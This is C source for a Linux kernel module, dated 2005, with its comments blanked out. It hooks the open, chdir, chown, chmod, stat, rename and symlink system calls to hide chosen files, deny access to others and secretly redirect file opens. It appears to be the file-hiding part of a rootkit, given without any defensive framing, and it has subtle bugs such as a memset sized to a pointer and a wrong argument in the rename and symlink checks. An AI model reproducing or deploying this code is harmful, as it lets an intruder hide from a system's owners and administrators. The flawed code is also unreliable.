/**************************************************
 *                                                *
 *        .  *
 *     ,       *
 *    .                         *
 *  Written by _4epen, 2005.                      *
 *                                                *
 **************************************************/
 
#include <linux/module.h>
#include <linux/kernel.h>
#include <asm/uaccess.h>

#include "prototp.h"

/*      */
extern int (*o_brk)(void*);
extern int (*o_open)(const char*, int, mode_t);
extern int (*o_chdir)(const char*);
extern int (*o_chown)(const char*, uid_t, gid_t);
extern int (*o_lchown)(const char*, uid_t, gid_t);
extern int (*o_chmod)(const char*, mode_t);
extern int (*o_stat)(const char*, struct stat*);
extern int (*o_rename)(const char*, const char*);
extern int (*o_symlink)(const char*, const char*);
extern int (*o_write)(int, const void*, size_t);
extern int (*o_getcwd)(char*, size_t);

/*  ,      */
int h_open(const char* filename, int flags, mode_t mode)
{
	char* file;
	char* temp;
	int ret, tmp;
	unsigned long end;
	/*        */
	file = get_full_pathname(filename);
	/*      */
	if((temp=f_redirected(file))!=NULL) {
		/*      */
		end = current->mm->brk;
		ret = o_brk((void *)(end+300));
		if (ret<0) return ret;
		/*         */
		copy_to_user((void *)(end+2), temp, strlen(temp)+1);
		/*     */
		ret = o_open((char *)(end+2), flags, mode);
		/*         */
		tmp = o_brk((void *)end);
		if(filename[0]!='/') kfree(file);
		return ret;								  
	}
	/*      */
	if(f_forbidden(file)){
		if(filename[0]!='/') kfree(file);
		return -EACCES;
	}
	/*      */
	if(f_hidden(file)) {
		if(filename[0]!='/') kfree(file);
		return -ENOENT;
	}
	if(filename[0]!='/') kfree(file);
	/*    open()  */
	return o_open(filename, flags, mode);
}

/*      /   */
int h_chdir(const char* path)
{
	char* file;
	file = get_full_pathname(path);
	/*      */
	if(f_hidden(file)) { if(path[0]!='/') kfree(file); return -ENOENT; }
	/*      */
	if(f_forbidden(file)) { if(path[0]!='/') kfree(file); return -EACCES; }
	/*     */
	if(path[0]!='/') kfree(file);
	/*    chdir()  */
	return o_chdir(path);
}

/*     /   */
int h_chown(const char* path, uid_t owner, gid_t group)
{
	char* file;
	file = get_full_pathname(path);
	/*      */
	if(f_hidden(file)) { if(path[0]!='/') kfree(file); return -ENOENT; }
	/*      */
	if(f_forbidden(file)) { if(path[0]!='/') kfree(file); return -EACCES; }
	/*     */
	if(path[0]!='/') kfree(file);
	/*    chown()  */
	return o_chown(path, owner, group);
}

/*     /   */
int h_lchown(const char* path, uid_t owner, gid_t group)
{
	char* file;
	file = get_full_pathname(path);
	/*      */
	if(f_hidden(file)) { if(path[0]!='/') kfree(file); return -ENOENT; }
	/*      */
	if(f_forbidden(file)) { if(path[0]!='/') kfree(file); return -EACCES; }
	/*     */
	if(path[0]!='/') kfree(file);
	/*    chown()  */
	return o_lchown(path, owner, group);
}

/*     /   */
int h_chmod(const char* path, mode_t mode)
{
	char* file;
	file = get_full_pathname(path);
	/*      */
	if(f_hidden(file)) { if(path[0]!='/') kfree(file); return -ENOENT; }
	/*      */
	if(f_forbidden(file)) { if(path[0]!='/') kfree(file); return -EACCES; }
	/*     */
	if(path[0]!='/') kfree(file);
	/*    chmod()  */
	return o_chmod(path, mode);
}

/*      /   */
int h_stat(const char* path, struct stat* buf)
{
	char* file;
	file = get_full_pathname(path);
	/*      */
	if(f_hidden(file)) { if(path[0]!='/') kfree(file); return -ENOENT; }
	/*      */
	if(f_forbidden(file)) { if(path[0]!='/') kfree(file); return -EACCES; }
	/*     */
	if(path[0]!='/') kfree(file);
	/*    stat()  */
	return o_stat(path, buf);
}

/*     /   */
int h_rename(const char* oldpath, const char* newpath)
{
	char *file, *file1;
	file = get_full_pathname(oldpath);
	file1 = get_full_pathname(newpath);
	/*      */
	if(f_hidden(file) || f_hidden(file1)) { if(oldpath[0]!='/') kfree(file); if(newpath[0]!='/') kfree(file1); return -ENOENT; }
	/*      */
	if(f_forbidden(file) || f_forbidden(newpath)) { if(oldpath[0]!='/') kfree(file); if(newpath[0]!='/') kfree(file1); return -EACCES; }
	/*     */
	if(oldpath[0]!='/') kfree(file); if(newpath[0]!='/') kfree(file1);
	/*    rename()  */
	return o_rename(oldpath, newpath);
}

/*     /   */
int h_symlink(const char* oldpath, const char* newpath)
{
	char *file, *file1;
	file = get_full_pathname(oldpath);
	file1 = get_full_pathname(newpath);
	/*      */
	if(f_hidden(file) || f_hidden(file1)) { if(oldpath[0]!='/') kfree(file); if(newpath[0]!='/') kfree(file1); return -ENOENT; }
	/*      */
	if(f_forbidden(file) || f_forbidden(newpath)) { if(oldpath[0]!='/') kfree(file); if(newpath[0]!='/') kfree(file1); return -EACCES; }
	/*     */
	if(oldpath[0]!='/') kfree(file); if(newpath[0]!='/') kfree(file1);
	/*    symlink()  */
	return o_symlink(oldpath, newpath);
}

int get_cur_wd(char* x)
{
	int ret;
	unsigned long end;
	/*      */
	end = current->mm->brk;
	ret = o_brk((void *)(end+4098));
	if (ret<0) return ret;
	/*      */
	o_getcwd((void*)(end+2), 4096);
	copy_from_user(x, (void*)(end+2), 4096);
	o_brk((void*)end);
	return 0;
}

char* get_full_pathname(const char* file)
{
	char *x;
	/*        */
	if(file[0]=='/') return (char*)file;
	/*         */
	x = (char*)kmalloc(4098+strlen(file), GFP_KERNEL);
	memset(x, 0, sizeof(x));
	/*      */
	get_cur_wd(x);
	/*      */
	strcat(x, "/");
	strcat(x, file);
	return x;
}
